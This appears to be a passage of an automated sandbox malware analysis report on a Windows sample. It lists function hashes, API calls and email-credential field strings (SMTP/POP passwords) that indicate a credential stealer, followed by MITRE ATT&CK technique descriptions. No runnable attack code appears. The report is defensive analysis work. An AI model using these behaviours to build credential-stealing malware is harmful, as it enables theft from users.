Instruction ID: f17d4b4ca0ba708fd9410bf51e058e85b1ccbe614709ed5a6c23c887c0f25f0e
Opcode Fuzzy Hash: dc86ca5a25f507e406179b5a226982a1a39ed3b60a1bb36b4c6698a04ba179ee
Instruction Fuzzy Hash: 991136B1D003498FDB20DFAAC445B9EFBF5EB88324F248819D519A7240CB79A941CFA4

Function 07976550 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0797D28D

Memory Dump Source

Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 4a54618d1688bfa7e668a2c72b283cf352287711f6cddd0b324f2a39088ee7c9
Instruction ID: 28956b0338771f229ec937da0eb184d52069593c04564f1c6fcb8de60fb7b2e1
Opcode Fuzzy Hash: 4a54618d1688bfa7e668a2c72b283cf352287711f6cddd0b324f2a39088ee7c9
Instruction Fuzzy Hash: EF1106B59003499FDB10DF9AD485BDEBBF8EB48324F108459E914A7200C375A945CFA5

Function 02E3B4B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02E3B51E

Memory Dump Source

Source File: 0000000D.00000002.1346314320.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e30000_vLQwEscoQr.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f3881b3270fc519f65ba1c8241daeac19d4b58b13f7e9a00a1fa1836273a1b83
Instruction ID: aa0695e648f8312022ca63f7615a99a18b3b087c4e2671cfd5a783504745e444
Opcode Fuzzy Hash: f3881b3270fc519f65ba1c8241daeac19d4b58b13f7e9a00a1fa1836273a1b83
Instruction Fuzzy Hash: F2110FB6C002498FCB20DF9AD444B9EFBF5AB88328F14846AD429A7200D379A545CFA1

Function 0128D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1344112534.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_128d000_vLQwEscoQr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6965356206163cf73e33f0f85d38d2cc1b7a3f04c96fb6e2a0792cb10bb7abef
Instruction ID: 130995d3d36e86d9bf58ca98c9971a145cf7be92996089b8c76cefa7af0974f5
Opcode Fuzzy Hash: 6965356206163cf73e33f0f85d38d2cc1b7a3f04c96fb6e2a0792cb10bb7abef
Instruction Fuzzy Hash: A8213675514208DFDB05EF48D9C0B56BB65FB84324F20C169D9090B2D7C376E45ACAA2

Function 0129D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1344283733.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_129d000_vLQwEscoQr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6a249a3bb2c33ee79f6889b143116038de46eacea2664cf0d6d021cccf4fba3
Instruction ID: 2ee02e226035370800026f12803df7680f0be8254547d40067a69da70f4f7d72
Opcode Fuzzy Hash: b6a249a3bb2c33ee79f6889b143116038de46eacea2664cf0d6d021cccf4fba3
Instruction Fuzzy Hash: 7A213071614308DFDF14DF68D884B16BB61EB84314F20C56DD90A0B282C33AD807DA62

Function 0129D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1344283733.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_129d000_vLQwEscoQr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 014f8589962d5b9e9e8f001a573cb403b4b4d6cef5deff998492d99a29839ccc
Instruction ID: 9191db5a94ebbb8ce4acdf4e636abdb926bb220fc818aadf340755094a60730b
Opcode Fuzzy Hash: 014f8589962d5b9e9e8f001a573cb403b4b4d6cef5deff998492d99a29839ccc
Instruction Fuzzy Hash: E5213775A14308DFDF05DF98D9C0B15BB61FB84324F20C5ADD9094B287C376D806DA61

Function 0128D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1344112534.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_128d000_vLQwEscoQr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction ID: 8d839e9d2b435f2407513573cbee338decff8dfe49ecbd05fbab7bf20c666ca1
Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction Fuzzy Hash: FA110376504284DFCB06DF48D5C0B56BF72FB84324F24C2A9D9090B297C33AE45ACBA1

Function 0129D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1344283733.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_129d000_vLQwEscoQr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
Instruction ID: 75c4af719fceafb765acf5431c7400cb386c997789168aa8a34cab3cde99df52
Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
Instruction Fuzzy Hash: 8411BB75904284DFDB06CF58C6C0B15BBA2FB84324F24C6ADD9494B297C33AD40ACB61

Function 0129D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1344283733.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_129d000_vLQwEscoQr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
Instruction ID: e629a68674127133de755b2fdbd0faff866ca3ebcfb832e395b6ba132d5ff9e0
Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
Instruction Fuzzy Hash: A311BB75504284CFDB16CF68D5C4B15BBA2FB84324F24C6AED9494B696C33AD40ACBA2

Function 0128D731 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1344112534.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_128d000_vLQwEscoQr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd2fb5f91c83b0fa62dd415e852e24fd21d2df62086c74a8ed8d6e2631b8a57c
Instruction ID: 03435aacb688b10c20630a2c7bcb2efe926fcec9617053e0e3bb1ea1ab0759b4
Opcode Fuzzy Hash: dd2fb5f91c83b0fa62dd415e852e24fd21d2df62086c74a8ed8d6e2631b8a57c
Instruction Fuzzy Hash: 5A01F7314263889AE7247A65CCC4B66BF98DF44225F18C419EE080A1C3C2789848CAB6

Function 0128D730 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1344112534.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_128d000_vLQwEscoQr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76e0565cc70c6fd83e26289e6d9ca27b7392d6f9a82a1f5f60c284e10ed6fa9c
Instruction ID: 5324dbf05353a33e918c772dac544273cc8d9bd5a3b593ae409722c450a32977
Opcode Fuzzy Hash: 76e0565cc70c6fd83e26289e6d9ca27b7392d6f9a82a1f5f60c284e10ed6fa9c
Instruction Fuzzy Hash: 43F0C271005384AEE714AA1ACC84B62FF98EB84335F18C55AEE080A2C3C3789844CA71

Analysis Process: vLQwEscoQr.exePID: 8048, Parent PID: 7512COMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.3%
Total number of Nodes:	302
Total number of Limit Nodes:	13

Executed Functions

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_vLQwEscoQr.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_vLQwEscoQr.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_vLQwEscoQr.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_vLQwEscoQr.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00413A3F Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000,00000000,E567384D,00000000,00000000,?,00413B8D,00000000,?,?,004139CC,00000000), ref: 00413A54

Memory Dump Source

Source File: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_vLQwEscoQr.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
Instruction ID: a51fc36abc950c8e07eb8ba8f8e19e2949325f4e0a3e122df0d5a7568418e784
Opcode Fuzzy Hash: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
Instruction Fuzzy Hash: 52B092B11042087EAA402EF19C05D3B3A4DCA44508B0044357C08E5422E936EE2050A4

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_vLQwEscoQr.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_vLQwEscoQr.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

Technology, xrefs: 0040D08D
SmtpPassword, xrefs: 0040D117
EmailAddress, xrefs: 0040D074
PopPassword, xrefs: 0040D0D0
PopServer, xrefs: 0040D099
SmtpPort, xrefs: 0040D0EB
SmtpAccount, xrefs: 0040D0FA
SmtpServer, xrefs: 0040D0DC
PopPort, xrefs: 0040D0A7
PopAccount, xrefs: 0040D0B6

Memory Dump Source

Source File: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_vLQwEscoQr.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Function 00402B7C Relevance: 2.5, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_vLQwEscoQr.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_vLQwEscoQr.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_vLQwEscoQr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Function 004061C3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261

Strings

IDA, xrefs: 00406304
IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B

Memory Dump Source

Source File: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_vLQwEscoQr.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorLast
String ID: IDA$IDA
API String ID: 887189805-2020647798
Opcode ID: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_vLQwEscoQr.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
